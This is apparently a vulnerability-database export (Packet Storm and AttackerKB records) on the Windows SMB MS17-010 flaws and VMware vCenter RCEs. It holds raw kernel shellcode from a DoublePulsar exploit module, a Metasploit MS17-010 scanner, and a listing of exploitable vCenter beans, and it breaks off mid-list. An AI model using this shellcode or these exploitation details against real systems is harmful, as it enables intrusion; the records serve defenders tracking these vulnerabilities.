\n\"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\ \n\"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\ \n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\ \n\"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\ \n\"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\ \n\"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\ \n\"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\ \n\"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\ \n\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\ \n\"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\ \n\"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\ \n\"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\" \nend \n \ndef kernel_shellcode_size \nmake_kernel_shellcode('').length \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156196/smb_doublepulsar_rce.rb.txt"}, {"lastseen": "2017-04-18T01:24:55", "description": "", "cvss3": {}, "published": "2017-04-17T00:00:00", "type": "packetstorm", "title": "Microsoft Windows MS17-010 SMB Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-04-17T00:00:00", "id": "PACKETSTORM:142181", "href": "https://packetstormsecurity.com/files/142181/Microsoft-Windows-MS17-010-SMB-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# auxiliary/scanner/smb/smb_ms_17_010 \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::SMB::Client \ninclude Msf::Exploit::Remote::SMB::Client::Authenticated \n \ninclude Msf::Auxiliary::Scanner \ninclude Msf::Auxiliary::Report \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS17-010 SMB RCE Detection', \n'Description' => %q{ \nUses information disclosure to determine if MS17-010 has been patched or not. \nSpecifically, it connects to the IPC$ tree and attempts a transaction on FID 0. \nIf the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does \nnot have the MS17-010 patch. \n \nThis module does not require valid SMB credentials in default server \nconfigurations. It can log on as the user \"\\\" and connect to IPC$. \n}, \n'Author' => [ 'Sean Dillon <sean.dillon@risksense.com>' ], \n'References' => \n[ \n[ 'CVE', '2017-0143'], \n[ 'CVE', '2017-0144'], \n[ 'CVE', '2017-0145'], \n[ 'CVE', '2017-0146'], \n[ 'CVE', '2017-0147'], \n[ 'CVE', '2017-0148'], \n[ 'MSB', 'MS17-010'], \n[ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'] \n], \n'License' => MSF_LICENSE \n)) \nend \n \ndef run_host(ip) \nbegin \nstatus = do_smb_probe(ip) \n \nif status == \"STATUS_INSUFF_SERVER_RESOURCES\" \nprint_warning(\"Host is likely VULNERABLE to MS17-010!\") \nreport_vuln( \nhost: ip, \nname: self.name, \nrefs: self.references, \ninfo: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$' \n) \nelsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\" \n# STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others) \nprint_good(\"Host does NOT appear vulnerable.\") \nelse \nprint_bad(\"Unable to properly detect if host is vulnerable.\") \nend \n \nrescue ::Interrupt \nprint_status(\"Exiting on interrupt.\") \nraise $! \nrescue ::Rex::Proto::SMB::Exceptions::LoginError \nprint_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\") \nrescue ::Exception => e \nvprint_error(\"#{e.class}: #{e.message}\") \nensure \ndisconnect \nend \nend \n \ndef do_smb_probe(ip) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nipc_share = \"\\\\\\\\#{ip}\\\\IPC$\" \nsimple.connect(ipc_share) \ntree_id = simple.shares[ipc_share] \n \nprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\") \n \n# request transaction with fid = 0 \npkt = make_smb_trans_ms17_010(tree_id) \nsock.put(pkt) \nbytes = sock.get_once \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \n# convert error code to string \ncode = pkt['SMB'].v['ErrorClass'] \nsmberr = Rex::Proto::SMB::Exceptions::ErrorCode.new \nstatus = smberr.get_error(code) \n \nprint_status(\"Received #{status} with FID = 0\") \nstatus \nend \n \ndef make_smb_trans_ms17_010(tree_id) \n# make a raw transaction packet \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \n# opcode 0x23 = PeekNamedPipe, fid = 0 \nsetup = \"\\x23\\x00\\x00\\x00\" \nsetup_count = 2 # 2 words \ntrans = \"\\\\PIPE\\\\\\x00\" \n \n# calculate offsets to the SetupData payload \nbase_offset = pkt.to_s.length + (setup.length) - 4 \nparam_offset = base_offset + trans.length \ndata_offset = param_offset # + 0 \n \n# packet baselines \npkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION \npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode \npkt['Payload']['SMB'].v['TreeID'] = tree_id \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload'].v['ParamCountMax'] = 0xffff \npkt['Payload'].v['DataCountMax'] = 0xffff \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataOffset'] = data_offset \n \n# actual magic: PeekNamedPipe FID=0, \\PIPE\\ \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup \npkt['Payload'].v['Payload'] = trans \n \npkt.to_s \nend \nend \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142181/mswinsmb-exec.rb.txt"}], "attackerkb": [{"lastseen": "2022-11-29T17:13:58", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n\n \n**Recent assessments:** \n \n**ccondon-r7** at February 24, 2021 11:19pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\n**wvu-r7** at February 24, 2021 10:11pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "attackerkb", "title": "VMware vSphere Client Unauth Remote Code Execution Vulnerability \u2014 CVE-2021-21972", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-05T00:00:00", "id": "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "href": "https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T20:15:23", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\n**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0143", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-27T11:14:06", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0148", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:0B98F2DD-5956-40B0-B275-66C7E7BB4D2D", "href": "https://attackerkb.com/topics/N7nzZYYXHW/cve-2017-0148", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-15T02:13:11", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0146", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:9977C74D-CDF9-4992-9D78-89CEEEAEA23A", "href": "https://attackerkb.com/topics/DPN51hmEne/cve-2017-0146", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-20T02:15:27", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0144 (MS17-010)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-01T07:02:45", "description": "The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 24, 2021 3:58am UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**NinjaOperator** at September 21, 2021 6:53pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**architect00** at September 22, 2021 1:31pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22005", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005"], "modified": "2021-09-29T00:00:00", "id": "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "href": "https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-19T11:06:39", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 28, 2021 10:35pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n \n \n advancedOptionsService\n capabilityPropertyProviderImpl\n ceipService\n clusterDpConfigService\n cnManager\n computeInventoryService\n configureClusterService\n configureStretchedClusterService\n configureVsanClusterMutationProviderImpl\n connectionRetention\n dataAccessController\n dataService\n dataServiceExtensionRegistry\n datacenterInventoryService\n diskGroupMutationService\n diskManagementService\n dpClient\n dpFactory\n encryptionMutationProvider\n encryptionPropertyProvider\n execFactory\n execSettings\n guardRailPropertyProviderAdapter\n hciClusterService\n healthCheckDelay\n healthCheckTimeout\n legacyVsanObjectVersionProviderImpl\n localizedMessageBundle\n lookupSvcClient\n lsFactory\n lsLocator\n multiVmRestoreBacking\n mvcContentNegotiationManager\n mvcCorsConfigurations\n mvcHandlerMappingIntrospector\n mvcUriComponentsContributor\n networkInventoryService\n networkIpConfigProvider\n obfuscationController\n obfuscationService\n objectReferenceService\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#0\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#1\n org.eclipse.gemini.blueprint.service.exporter.support.OsgiServiceFactoryBean#2\n org.springframework.context.annotation.internalAsyncAnnotationProcessor\n org.springframework.context.annotation.internalAutowiredAnnotationProcessor\n org.springframework.context.annotation.internalCommonAnnotationProcessor\n org.springframework.context.annotation.internalConfigurationAnnotationProcessor\n org.springframework.context.annotation.internalPersistenceAnnotationProcessor\n org.springframework.context.annotation.internalRequiredAnnotationProcessor\n org.springframework.context.annotation.internalScheduledAnnotationProcessor\n org.springframework.context.event.internalEventListenerFactory\n org.springframework.context.event.internalEventListenerProcessor\n org.springframework.format.support.FormattingConversionServiceFactoryBean#0\n org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping\n org.springframework.web.servlet.handler.MappedInterceptor#0\n org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter\n org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter\n org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver#0\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter\n org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping\n org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver#0\n org.springframework.web.servlet.view.ContentNegotiatingViewResolver#0\n pbmClient\n pbmDataProviderImpl\n pbmFactory\n permissionService\n physicalDisksService\n proactiveTestsService\n promoteActionController\n proxygenController\n purgeInaccessibleVmSwapObjectsProvider\n restoreWorkflowBacking\n sessionScheduler\n singleVmRestoreBacking\n ssoFactory\n taskService\n updateDbService\n userSessionService\n vcClient\n vcFactory\n vcPropertiesFacade\n virtualObjectsDataProtectionController\n virtualObjectsService\n vlsiSettingsTemplate\n vmConsistencyGroupPropertyProvider\n vmDataProtectionPropertyProviderAdapter\n vmDataProtectionSummaryController\n vmDataProtectionSyncPointsController\n vmDiskPlacementProvider\n vmFolderInventorySerivce\n vmInventoryService\n vmodlContext\n vmodlHelper\n vsanCapabilityCacheManager\n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanClusterPropertyProviderAdapter\n vsanClusterPropertyProviderAdapterImpl\n vsanComponentsProviderImpl\n vsanConfigPropertyProviderAdapter\n vsanConfigPropertyProviderAdapterImpl\n vsanConfigService\n vsanDiskMappingsProvider\n vsanDpInventoryHelper\n vsanDpServicePitProvider\n vsanExecutor\n vsanFolderPropertyProviderAdapter\n vsanFolderPropertyProviderAdapterImpl\n vsanFormatUtils_setUserSessionService\n vsanHealthProviderImpl\n vsanHealthServiceMutationProviderImpl\n vsanHostPropertyProviderAdapter\n vsanIscsiInitiatorGroupMutationProviderImpl\n vsanIscsiInitiatorGroupPropertyProviderImpl\n vsanIscsiMutationProviderImpl\n vsanIscsiPropertyProviderImpl\n vsanIscsiTargetDataAdapter\n vsanIscsiTargetDataAdapterImpl\n vsanIscsiTargetMutationProviderImpl\n vsanIscsiTargetPropertyProviderImpl\n vsanMutationProviderImpl\n vsanObjectSystemProvider\n vsanPerfDiagnosticProviderImpl\n vsanPerfMutationProviderImpl\n vsanPerfProviderImpl\n vsanPropertyProviderImpl\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanResyncingComponentsProvider\n vsanResyncingComponentsRetriever\n vsanResyncingIscsiTargetComponentsProvider\n vsanServiceBundleActivator\n vsanServiceFactory\n 